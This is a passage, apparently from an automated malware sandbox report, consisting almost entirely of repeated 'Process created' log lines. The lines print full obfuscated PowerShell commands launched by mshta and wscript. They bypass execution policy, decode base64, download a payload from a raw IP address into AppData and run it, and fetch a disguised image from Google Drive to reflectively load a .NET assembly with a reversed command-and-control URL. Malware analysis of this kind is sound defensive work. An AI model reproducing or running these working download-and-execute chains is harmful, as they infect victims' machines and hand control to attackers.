yZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICA